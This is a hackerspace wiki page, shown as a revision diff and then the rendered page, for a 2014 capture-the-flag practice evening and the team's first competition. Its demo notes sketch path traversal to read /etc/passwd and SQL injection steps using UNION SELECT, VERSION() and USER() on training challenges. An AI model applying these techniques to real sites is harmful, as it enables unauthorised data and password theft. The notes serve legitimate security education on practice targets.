Difference between revisions of "CTF-practice-evening:2014-01-13"
(27 intermediate revisions by 2 users not shown) | |||
Line 3: | Line 3: | ||
|Location=Tech Inc | |Location=Tech Inc | ||
|EventType=Workshop | |EventType=Workshop | ||
− | |Contact=Melanie, | + | |Contact=Melanie, |
}} | }} | ||
= Capture The Flag evening - Part 4 = | = Capture The Flag evening - Part 4 = | ||
Line 16: | Line 16: | ||
= Our 1st CTF = | = Our 1st CTF = | ||
+ | |||
+ | * Positive Hack Days (PhD) qualifier | ||
+ | ** 48 hours: Jan. 25, 2014, 8 a.m. — Jan. 27, 2014, 8 a.m. | ||
+ | ** http://quals.phdays.ru/ | ||
+ | |||
+ | * Let's meet at Tech Inc on Saturday | ||
+ | ** Jan 25 - 10 AM | ||
+ | ** TODO: Add to Tech Inc event list | ||
+ | ** Sunday is the Tech Inc ALV, so things won't be as organised that day.. | ||
* We are now registered for the Positive Hack Days, as team Knuffelhackers | * We are now registered for the Positive Hack Days, as team Knuffelhackers | ||
* See: http://knuffelhackers.nl | * See: http://knuffelhackers.nl | ||
+ | |||
+ | * Stuff to prepare | ||
+ | ** Stepping stone box (for storing tools, and allowing lots of people access) | ||
+ | ** Edit pad - etherpad or https://quadpad.lqdn.fr | ||
+ | *** We will want to archive this afterwards, for write-ups and stuff | ||
+ | ** IRC channel - create a password-protected #techinc-ctf channel | ||
+ | * We have a mailing list already - http://technologia-incognita.nl/cgi-bin/mailman/listinfo/ctf | ||
= Web hacking!!!! = | = Web hacking!!!! = | ||
+ | * Julius is talking about OWASP and Web Hacking this evening | ||
+ | ** Topics: brute force, SQL injections, Network eavesdropping, XSS, Session hijacking | ||
+ | |||
+ | * Afterwards, Stef did some web hacking demonstrations, using Certified Secure | ||
+ | ** Challenge: Herman Vluchtbeveiliging | ||
+ | *** Add a single quote at the end of a URL to see if it breaks | ||
+ | *** Can we request a specific page? Example: pagina=/etc/passwd | ||
+ | *** This doesn't work, but we get enough information to be able to see where it's located in the filesystem | ||
+ | *** With some directory traversal, we can dump the password file | ||
+ | ** Challenge: Security Shop | ||
+ | *** We can exploit the Search Product field | ||
+ | *** Once again, we want to cause an error that gets information from the backend.. we can use a single quote again | ||
+ | *** This indeed gives us the SQL query, including part of the database schema | ||
+ | *** You can use UNION to concatenate two adjacent tables | ||
+ | *** We can try using UNION SELECT 1 -- | ||
+ | *** We can see from the error message that the UNION isn't matching up with a table w/ 5 columns | ||
+ | *** We can now try using UNION SELECT 1,2,3,4 -- | ||
+ | *** Another query that works often is VERSION() | ||
+ | *** If we replace 3 with VERSION(), we can now see the Ubuntu version running | ||
+ | *** USER() also leaks information | ||
+ | *** Trial and error works pretty well here… we need to select things from other tables.. we can guess what these tables might be called | ||
+ | *** You can query the password this way | ||
+ | |||
+ | == Informational Links == | ||
* https://www.owasp.org/index.php/Category:Attack | * https://www.owasp.org/index.php/Category:Attack | ||
− | |||
− | |||
− | |||
− | |||
** https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents | ** https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents | ||
** http://w3schools.com | ** http://w3schools.com | ||
** http://yehg.net/lab/#toolbox | ** http://yehg.net/lab/#toolbox | ||
− | ** http://www.hackthissite.org | + | * https://hackvertor.co.uk/public |
+ | |||
+ | == Web-Hacking Wargames == | ||
+ | |||
+ | * https://www.certifiedsecure.com - Start with this one! | ||
+ | * OWASP Web Goat (requires setting up a VM) | ||
+ | ** https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project - Web hacking stand-alone SW | ||
+ | ** http://tostercrums.blogspot.nl/2011/11/running-webgoat-owasp-in-ubuntu-vm.html - Installation advice | ||
+ | ** http://webappsecmovies.sourceforge.net/webgoat/ - solutions | ||
+ | * http://www.hackthissite.org |
Latest revision as of 22:35, 13 January 2014
CTF-practice-evening:2014-01-13 | |
---|---|
Date | 2014/01/13 |
Time | |
Location | Tech Inc |
Type | Workshop |
Contact | Melanie |
Contents
Capture The Flag evening - Part 4
- 13 January, 2014 - 8 PM
- Please bring along a laptop with you!!!
General CTF Info
- See the page for the Ctf-evenings
- Link to the Tech Inc Challenge Website Scoreboard
Our 1st CTF
- Positive Hack Days (PhD) qualifier
- 48 hours: Jan. 25, 2014, 8 a.m. — Jan. 27, 2014, 8 a.m.
- http://quals.phdays.ru/
- Let's meet at Tech Inc on Saturday
- Jan 25 - 10 AM
- TODO: Add to Tech Inc event list
- Sunday is the Tech Inc ALV, so things won't be as organised that day..
- We are now registered for the Positive Hack Days, as team Knuffelhackers
- See: http://knuffelhackers.nl
- Stuff to prepare
- Stepping stone box (for storing tools, and allowing lots of people access)
- Edit pad - etherpad or https://quadpad.lqdn.fr
- We will want to archive this afterwards, for write-ups and stuff
- IRC channel - create a password-protected #techinc-ctf channel
- We have a mailing list already - http://technologia-incognita.nl/cgi-bin/mailman/listinfo/ctf
Web hacking!!!!
- Julius is talking about OWASP and Web Hacking this evening
- Topics: brute force, SQL injections, Network eavesdropping, XSS, Session hijacking
- Afterwards, Stef did some web hacking demonstrations, using Certified Secure
- Challenge: Herman Vluchtbeveiliging
- Add a single quote at the end of a URL to see if it breaks
- Can we request a specific page? Example: pagina=/etc/passwd
- This doesn't work, but we get enough information to be able to see where it's located in the filesystem
- With some directory traversal, we can dump the password file
- Challenge: Security Shop
- We can exploit the Search Product field
- Once again, we want to cause an error that gets information from the backend.. we can use a single quote again
- This indeed gives us the SQL query, including part of the database schema
- You can use UNION to concatenate two adjacent tables
- We can try using UNION SELECT 1 --
- We can see from the error message that the UNION isn't matching up with a table w/ 5 columns
- We can now try using UNION SELECT 1,2,3,4 --
- Another query that works often is VERSION()
- If we replace 3 with VERSION(), we can now see the Ubuntu version running
- USER() also leaks information
- Trial and error works pretty well here… we need to select things from other tables.. we can guess what these tables might be called
- You can query the password this way
- Challenge: Herman Vluchtbeveiliging
Informational Links
Web-Hacking Wargames
- https://www.certifiedsecure.com - Start with this one!
- OWASP Web Goat (requires setting up a VM)
- https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project - Web hacking stand-alone SW
- http://tostercrums.blogspot.nl/2011/11/running-webgoat-owasp-in-ubuntu-vm.html - Installation advice
- http://webappsecmovies.sourceforge.net/webgoat/ - solutions
- http://www.hackthissite.org